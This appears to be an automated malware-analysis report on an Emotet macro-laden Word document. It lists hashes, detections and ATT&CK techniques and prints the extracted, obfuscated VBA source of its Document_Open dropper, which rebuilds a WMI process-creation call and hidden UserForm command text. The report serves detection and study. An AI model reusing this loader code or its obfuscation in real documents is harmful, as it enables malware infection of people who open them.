Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0107a277fb1b3f3c…

MALICIOUS

Office (OLE)

Size: 167.1 KB
Created: 2020-08-05 22:25:00
Authoring application: Microsoft Office Word
First seen: 2020-09-04
MD5: 2c6fa47c5d23832cf22e78795618afb6
SHA-1: 0e6a78ac19de2fd73d193c67222d139325bc9d2e
SHA-256: 0107a277fb1b3f3cf150d6ee41e1d1c89f89bc1a7ccb698c511115cb823197f4
Risk Score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open auto-execution macro and a hidden UserForm command stager, which are hallmarks of Emotet. The ClamAV detection also explicitly names Emotet. The VBA code likely uses CreateObject to execute a downloaded payload, a common technique for this family. The embedded URL was confirmed benign and is not considered a primary IOC.

Heuristics (7)

  • ClamAV: Doc.Dropper.EmotetIOS-9402070-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
  • VBA macros detected [medium; 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4651 bytes
SHA-256: ccdfcb602240c3e01d9229dcdd23fc5c43b16f6630167be7f8296c588cea42ed

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HXVUUejoissa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
OOFHKmiebwhtn.XESAYkhnuecwrrm
End Sub


Attribute VB_Name = "OOFHKmiebwhtn"
Attribute VB_Base = "0{8624FB89-A8D3-4117-9911-205E5F1165C7}{FA24B5FA-5B47-4C6D-B66B-89A67F8F1322}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function XESAYkhnuecwrrm()
Dim G0ÀqE8ÎByw As String
G0ÀqE8ÎByw = Replace$("IR8ÈFrToPGGvM", "IR8ÈFrTo", "dfIepuna")
Dim Jbw As Integer
Jbw = 5
Do While Jbw < 5 + 6
Jbw = Jbw + 9: DoEvents
Loop
Dim MRK As String
MRK = Replace$("NOb8ÄEg8kT4Zh", "NOb8ÄEg8k", "Vfw")
MBEXSuqsdmrkqwrn = Chr(OOFHKmiebwhtn.Zoom + ((10 + 100 + 10) / 8))
Dim IKmJU As Integer
IKmJU = 3
Do While IKmJU < 3 + 5
IKmJU = IKmJU + 7: DoEvents
Loop
EXGYDhkahbgebwi = "8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbuw8n3n3n34 89y128ghuu*(^yhus78bbui8n3n3n34 89y128ghuu*(^yhus78bbunm8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbugm8n3n3n34 89y128ghuu*(^yhus78bbut8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbu" + MBEXSuqsdmrkqwrn + "8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbu:8n3n3n34 89y128ghuu*(^yhus78bbuw8n3n3n34 89y128ghuu*(^yhus78bbuin8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbu38n3n3n34 89y128ghuu*(^yhus78bbu28n3n3n34 89y128ghuu*(^yhus78bbu_8n3n3n34 89y128ghuu*(^yhus78bbu" + OOFHKmiebwhtn.RNVCZqrolmhl + "8n3n3n34 89y128ghuu*(^yhus78bburo8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbuce8n3n3n34 89y128ghuu*(^yhus78bbus8n3n3n34 89y128ghuu*(^yhus78bbus8n3n3n34 89y128ghuu*(^yhus78bbu"
Dim dcSTK4âq8ÃW As String
dcSTK4âq8ÃW = Replace$("DHBnOjfiNZahw1Òa", "DHBnOjfiN", "bAiIFgfVja")
OKXPNvfeynqbukiphcu = OOKBRmuqjdcrte(EXGYDhkahbgebwi)
Dim ITXRER As Integer
ITXRER = 2
Do While ITXRER < 2 + 7
ITXRER = ITXRER + 9: DoEvents
Loop
Set BDHGXqjvrmqdlin = CreateObject(OKXPNvfeynqbukiphcu)
Dim lAUehL8ÑG As String
lAUehL8ÑG = Replace$("XMoYVoTQtfrL", "XMoYVoT", "emFbI")
KMDBVndycaktnxwm = OOFHKmiebwhtn.KFHTBzyrscnkocfgjx.ControlTipText
Dim NZ5ËgnTc As Integer
NZ5ËgnTc = 7
Do While NZ5ËgnTc < 7 + 2
NZ5ËgnTc = NZ5ËgnTc + 2: DoEvents
Loop
IDRTHdijvigj = isi2n2j3k4 + (OKXPNvfeynqbukiphcu + MBEXSuqsdmrkqwrn + OOFHKmiebwhtn.HSSCVskozbyqyii.ControlTipText + KMDBVndycaktnxwm)
Dim nON0ÇhIOIK As Integer
nON0ÇhIOIK = 8
Do While nON0ÇhIOIK < 8 + 8
nON0ÇhIOIK = nON0ÇhIOIK + 4: DoEvents
Loop
IYPISvfjhkmklspfz = IDRTHdijvigj + OOFHKmiebwhtn.RNVCZqrolmhl
Dim SM0iX As Integer
SM0iX = 8
Do While SM0iX < 8 + 5
SM0iX = SM0iX + 9: DoEvents
Loop
Set JSJDJatqrzutk = HQUZItllxidcnnnr(IYPISvfjhkmklspfz)
Dim ETZpw As Integer
ETZpw = 3
Do While ETZpw < 3 + 4
ETZpw = ETZpw + 7: DoEvents
Loop
mnb6jn3j = Array("usf", BDHGXqjvrmqdlin. _
Create(ZHJUPidwvredxhdymfo, NTKGNkjmrcpoac, JSJDJatqrzutk), "nsd jehh")
Dim g1åYXNNSUar As String
g1åYXNNSUar = Replace$("jTeicPLHL", "jTeicP", "cUjcG")
End Function
Function HQUZItllxidcnnnr(NKTEOqpjpdirywot)
Set HQUZItllxidcnnnr = CreateObject(NKTEOqpjpdirywot)
Dim jh1M As String
jh1M = Replace$("LCRKbiOXFcauqtY", "LCRKbiOXFc", "lyBt5À")
HQUZItllxidcnnnr. _
showwindow = AZZVKxrqhitm + AZLQNcvarxhllhtclo + FXPGFlkkvddyuxpmrqy
Dim XN21á4ÍUj As String
XN21á4ÍUj = Replace$("nVtbB0ÈHLRCM", "nVtbB0ÈHL", "KjhIHvL")
End Function
Function OOKBRmuqjdcrte(OHXWYefwmect)
ICREJfrxkphfwb = OHXWYefwmect
Dim XFcLa As String
XFcLa = Replace$("QmUea0ÅdZcGS3SUj", "QmUea0ÅdZcG", "CH0ÜiOXF")
SFWRRaksafqspcuzl = Split _
(ICREJfrxkphfwb, "8n3n3n34 89y" + "128ghuu*(^yhus78bbu")
Dim dZc1É As String
dZc1É = Replace$("EYSUj3ÓVtbBLHL7Û3Ô1ÛG", "EYSUj3ÓVtbB", "Mauq8ÈM")
JIEUImdkzowrvpfm = k6o3o3j + Join(SFWRRaksafqspcuzl, oj6jk)
Dim rJgNXUtq
... (truncated)